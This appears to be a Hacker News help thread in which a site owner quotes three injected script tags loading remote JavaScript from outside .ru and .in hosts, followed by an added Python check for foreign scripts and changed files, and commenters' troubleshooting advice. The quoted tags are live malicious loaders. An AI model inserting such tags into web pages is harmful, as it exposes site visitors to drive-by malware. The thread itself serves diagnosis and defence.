Ask HN: website getting hacked through code injection - needhelp123

hi HN,
For the past 4-5 days, every night my website is somehow hacked and some JavaScript code which redirects to a PHP page is inserted into my code. The problem is I know the server is not compromised because the only access to the server through RDP is allowed through my IP on the firewall. Aside from that it's only open on ports 80, 110 and 25.

Also, the date modified on the PHP script being edited doesn't change. It stays the same even though they are adding code to it. I've installed a malware inspector on the server and it didn't return anything.

I did some digging and made sure there is no "eval" code in my PHP sites and now I'm out of ideas. I remove the injection code but it looks like every night at 12am it gets put back in somehow.

I looked at the IIS logs on the server and don't see any hits for those URLs. Can you please help me and guide me on how to start troubleshooting this and pinpointing it down in my code to see where the attacker is getting in?

The code they inject is below:

<script type="text/javascript" src="http://in-sss.ru/code/js.php?i=5837&r=10568&p=12914&c=8"></script>
<script type="text/javascript" src="http://wap-ttd.in/code/js.php?i=5837&r=10568&p=12914&c=8"></script>
<script type="text/javascript" src="http://mnogo-code.ru/code/js.php?i=5837&r=10568&p=12914&c=8"></script>

Thanks
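An added example, not from the original post or any commenter: a Python check that flags external script tags whose host is outside an allow-list, and detects altered web files by SHA-256 content hash instead of modification time, since the poster saw the date modified stay unchanged. The allow-list host www.example.com, the file extensions scanned and the sample page are assumptions.

```python
# Added example (not the poster's code). Hosts, extensions and the sample
# page below are constructed for illustration.
import hashlib
import os
from html.parser import HTMLParser
from urllib.parse import urlparse

class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.srcs.extend(v for k, v in attrs if k.lower() == "src" and v)

def foreign_scripts(html, allowed_hosts):
    """Return script src URLs whose host is not in allowed_hosts.
    Relative srcs (no host) are treated as local and skipped."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    return [s for s in parser.srcs
            if urlparse(s).hostname and urlparse(s).hostname.lower() not in allowed_hosts]

def hash_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Map relative path -> SHA-256 of contents for web files under root.
    Content hashes, not mtimes: a reset timestamp hides nothing from this."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def changed_files(baseline, current):
    """Paths added or altered relative to a baseline snapshot from hash_tree()."""
    return sorted(p for p, d in current.items() if baseline.get(p) != d)

# Constructed sample page resembling the injection quoted in the post.
SAMPLE_HTML = (
    '<html><head><script src="/js/site.js"></script>\n'
    '<script type="text/javascript" src="http://in-sss.ru/code/js.php?i=5837&amp;r=10568"></script>\n'
    '<script src="https://www.example.com/app.js"></script></head><body>ok</body></html>'
)
```

Take a baseline with hash_tree() on a clean copy of the web root, then run changed_files() against a fresh snapshot after the nightly change to see exactly which files were touched despite the unchanged dates.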
======
kimura
Given that it happens at exactly 12am, it is safe to assume that the machine itself is infected with some kind of rogue software. Kill all unknown processes on the machine. Get an updated virus/malware cleaner. Look at scheduled tasks on the machine. Did you check registry entries? Good luck.

~~~
needhelp123
So I did a clean virus and malware search and nothing was found. I don't think this is on my server.

I know they are doing drive-by injections but I just don't know how to find out which page on my site they are using to do the injection.

------
SpacemanSpiff
I've encountered malware where the computer being used to administer the site was compromised, and the malicious code was injected periodically this way. So make sure your personal computer, as well as the computers of anyone with write access to the site, are clean. Good luck.

